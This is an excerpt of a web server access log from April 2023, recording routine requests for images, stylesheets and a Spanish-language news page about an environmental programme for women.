172.22.2.4 - - [21/Apr/2023:06:31:50 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [21/Apr/2023:06:31:50 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [21/Apr/2023:06:31:50 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
172.22.2.4 - - [21/Apr/2023:06:31:50 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
172.22.2.4 - - [21/Apr/2023:06:31:50 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [21/Apr/2023:06:31:50 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [21/Apr/2023:06:31:50 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [21/Apr/2023:06:31:50 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [21/Apr/2023:06:31:50 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [21/Apr/2023:06:31:50 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [21/Apr/2023:06:31:50 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
179.19.51.113 - - [21/Apr/2023:06:31:53 -0500] "GET / HTTP/1.1" 200 4720
179.19.51.113 - - [21/Apr/2023:06:31:53 -0500] "GET /js/url.js HTTP/1.1" 404 1294
179.19.51.113 - - [21/Apr/2023:06:31:53 -0500] "GET /css/bootstrap.min.css HTTP/1.1" 200 178212
179.19.51.113 - - [21/Apr/2023:06:31:53 -0500] "GET /fonts/icomoon/style.css HTTP/1.1" 200 79820
179.19.51.113 - - [21/Apr/2023:06:31:53 -0500] "GET /css/style.css HTTP/1.1" 200 3473
172.22.2.4 - - [21/Apr/2023:06:31:56 -0500] "GET /BLA/boletinlegal/images/screen_5.png HTTP/1.1" 200 368876
172.22.2.4 - - [21/Apr/2023:06:31:56 -0500] "GET /BLA/boletinlegal/images/arr_r.jpg HTTP/1.1" 200 1998
172.22.2.4 - - [21/Apr/2023:06:31:56 -0500] "GET /BLA/boletinlegal/images/screen_2.png HTTP/1.1" 200 362502
172.22.2.4 - - [21/Apr/2023:06:31:56 -0500] "GET /BLA/boletinlegal/images/screen_3.png HTTP/1.1" 200 210620
172.22.2.4 - - [21/Apr/2023:06:31:56 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [21/Apr/2023:06:32:06 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
179.19.51.113 - - [21/Apr/2023:06:32:16 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
172.22.2.4 - - [21/Apr/2023:06:30:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53924
186.154.35.26 - - [21/Apr/2023:06:32:37 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
181.59.3.27 - - [21/Apr/2023:06:32:42 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
216.245.221.92 - - [21/Apr/2023:06:32:43 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [21/Apr/2023:06:31:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
181.59.3.254 - - [21/Apr/2023:06:33:13 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
186.84.91.16 - - [21/Apr/2023:06:33:31 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
179.51.118.141 - - [21/Apr/2023:06:33:50 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
